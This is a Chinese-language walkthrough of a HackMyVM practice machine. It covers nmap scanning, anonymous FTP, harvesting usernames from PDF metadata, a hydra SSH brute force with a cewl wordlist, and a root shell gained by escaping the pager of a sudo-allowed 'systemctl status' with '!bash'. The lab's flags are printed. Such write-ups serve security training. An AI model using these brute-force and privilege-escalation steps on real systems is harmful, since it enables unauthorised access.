难度:Easy
kali:192.168.56.104
靶机:192.168.56.145
端口扫描
┌──(root㉿kali2)-[~]
└─# nmap 192.168.56.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 18:58 CST
Nmap scan report for 192.168.56.145
Host is up (0.000081s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:E0:55:E3 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
开启端口:21 22 80
试一下ftp匿名登录
┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.145
Connected to 192.168.56.145.
220 (vsFTPd 3.0.3)
Name (192.168.56.145:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11414|)
150 Here comes the directory listing.
-rw-rw-r-- 1 1000 1000 173864 Sep 13 2023 Brochure-1.pdf
-rw-rw-r-- 1 1000 1000 183931 Sep 13 2023 Brochure-2.pdf
-rw-rw-r-- 1 1000 1000 465409 Sep 13 2023 Financial-infographics-poster.pdf
-rw-rw-r-- 1 1000 1000 269546 Sep 13 2023 Gameboard-poster.pdf
-rw-rw-r-- 1 1000 1000 126644 Sep 13 2023 Growth-timeline.pdf
-rw-rw-r-- 1 1000 1000 1170323 Sep 13 2023 Population-poster.pdf
226 Directory send OK.
好多pdf文件,get下来看了一下,pdf上面没什么东西,分析一下有什么username
┌──(root㉿kali2)-[~/Desktop]
└─# exiftool *.pdf | grep Author
Author : joseph
Author : richard
Author : crystal
Author : catherine
Author : catherine
拿到几个用户名,可能有用
先随便扫一下
┌──(root㉿kali2)-[~]
└─# gobuster dir -u http://192.168.56.145 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.145
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php,bak,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/images (Status: 301) [Size: 317] [--> http://192.168.56.145/images/]
/index.html (Status: 200) [Size: 35027]
/about.html (Status: 200) [Size: 23219]
/contact.html (Status: 200) [Size: 14317]
/blog.html (Status: 200) [Size: 15196]
/main.html (Status: 200) [Size: 931]
/services.html (Status: 200) [Size: 17709]
/css (Status: 301) [Size: 314] [--> http://192.168.56.145/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.145/js/]
/cases.html (Status: 200) [Size: 18018]
/readme.txt (Status: 200) [Size: 410]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.145/fonts/]
/.html (Status: 403) [Size: 279]
Progress: 433406 / 1323366 (32.75%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 433517 / 1323366 (32.76%)
===============================================================
Finished
===============================================================
去web看下
没找到什么利用点
尝试用获取的username爆破一下ssh,用rockyou没爆破出来,可能字典不对,用cewl获取网页单词生成字典
┌──(root㉿kali2)-[~/Desktop]
└─# cewl http://192.168.56.145 > passes.txt┌──(root㉿kali2)-[~/Desktop]
└─# hydra -L user.txt -P passes.txt ssh://192.168.56.145 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 19:22:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1848 login tries (l:4/p:462), ~29 tries per task
[DATA] attacking ssh://192.168.56.145:22/
[22][ssh] host: 192.168.56.145 login: joseph password: wealthiest
[STATUS] 494.00 tries/min, 494 tries in 00:01h, 1386 to do in 00:03h, 32 active
拿到一组账号密码 joseph:wealthiest
直接拿到user flag
┌──(root㉿kali2)-[~/Desktop]
└─# ssh joseph@192.168.56.145
The authenticity of host '192.168.56.145 (192.168.56.145)' can't be established.
ED25519 key fingerprint is SHA256:nKBoUMUnxyKH34KaiDU6gjV4RVOrd181pL9rHCLLD0s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.145' (ED25519) to the list of known hosts.
joseph@192.168.56.145's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageSystem information as of Thu 04 Apr 2024 11:25:01 AM UTCSystem load: 0.26 Processes: 115Usage of /: 47.3% of 11.21GB Users logged in: 0Memory usage: 7% IPv4 address for enp0s3: 192.168.56.145Swap usage: 0%* Introducing Expanded Security Maintenance for Applications.Receive updates to over 25,000 software packages with yourUbuntu Pro subscription. Free for personal use.https://ubuntu.com/proExpanded Security Maintenance for Applications is not enabled.51 updates can be applied immediately.
To see these additional updates run: apt list --upgradableEnable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro statusThe list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settingsjoseph@elite-economists:~$ id
uid=1001(joseph) gid=1001(joseph) groups=1001(joseph)
joseph@elite-economists:~$ ls -al
total 32
drwxr-xr-x 4 joseph joseph 4096 Apr 4 11:23 .
drwxr-xr-x 6 root root 4096 Sep 13 2023 ..
-rw------- 1 joseph joseph 0 Sep 14 2023 .bash_history
-rw-r--r-- 1 joseph joseph 220 Sep 13 2023 .bash_logout
-rw-r--r-- 1 joseph joseph 3771 Sep 13 2023 .bashrc
drwx------ 2 joseph joseph 4096 Apr 4 11:23 .cache
drwxrwxr-x 3 joseph joseph 4096 Sep 13 2023 .local
-rw-r--r-- 1 joseph joseph 807 Sep 13 2023 .profile
-rw-rw-r-- 1 joseph joseph 3271 Sep 14 2023 user.txt
joseph@elite-economists:~$ cat user.txt ................... .................... ............................. ............................. ............ ........... ...... ............ ........ ........ ........ ........ ... ........ .... ....... ...... ..... .. ...... ..... ...... ............................. ..... ...... ............................. .............................. ..... ..... .............................. ..... ..... ..... ..... ..... ..... ..... ..... ..... .... ..................................................................................................
................................................................................................... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... .............................. ..... ..... .............................. ............................. ...... ..... ............................. ...... ..... ....... .. ..... ...... ........ ... ....... .... ....... ........ ......... ........ ........... ...... ........... ........... .............................. .............................. ..................... .................... Flag: HMV{37q3p33CsMJgJQbrbYZMUFfTu}
sudo -l
joseph@elite-economists:~$ sudo -l
Matching Defaults entries for joseph on elite-economists:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser joseph may run the following commands on elite-economists:(ALL) NOPASSWD: /usr/bin/systemctl status
直接执行
sudo /usr/bin/systemctl status
然后再底端命令行输入!bash就拿到了root权限
joseph@elite-economists:~$ sudo /usr/bin/systemctl status
● elite-economistsState: runningJobs: 0 queuedFailed: 0 unitsSince: Thu 2024-04-04 10:57:17 UTC; 32min agoCGroup: /├─user.slice │ └─user-1001.slice │ ├─user@1001.service …│ │ └─init.scope │ │ ├─1776 /lib/systemd/systemd --user│ │ └─1777 (sd-pam)│ └─session-4.scope │ ├─1760 sshd: joseph [priv]│ ├─1856 sshd: joseph@pts/0│ ├─1857 -bash│ ├─1898 sudo /usr/bin/systemctl status│ ├─1899 /usr/bin/systemctl status│ └─1900 pager├─init.scope │ └─1 /sbin/init maybe-ubiquity└─system.slice ├─apache2.service │ ├─759 /usr/sbin/apache2 -k start│ ├─764 /usr/sbin/apache2 -k start│ └─765 /usr/sbin/apache2 -k start├─systemd-networkd.service │ └─641 /lib/systemd/systemd-networkd├─systemd-udevd.service │ └─393 /lib/systemd/systemd-udevd├─cron.service │ └─659 /usr/sbin/cron -f├─polkit.service │ └─667 /usr/lib/policykit-1/polkitd --no-debug├─networkd-dispatcher.service
!bash
root@elite-economists:/home/joseph# id
uid=0(root) gid=0(root) groups=0(root)
root@elite-economists:~# cat ro*................... .................... ............................. ............................. ............ ........... ...... ............ ........ ........ ........ ........ ... ........ .... ....... ...... ..... .. ...... ..... ...... ............................. ..... ...... ............................. .............................. ..... ..... .............................. ..... ..... ..... ..... ..... ..... ..... ..... ..... .... ..................................................................................................
................................................................................................... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... .............................. ..... ..... .............................. ............................. ...... ..... ............................. ...... ..... ....... .. ..... ...... ........ ... ....... .... ....... ........ ......... ........ ........... ...... ........... ........... .............................. .............................. ..................... .................... Flag: HMV{NwER6XWyM8p5VpeFEkkcGYyeJ}这才是easy难度的
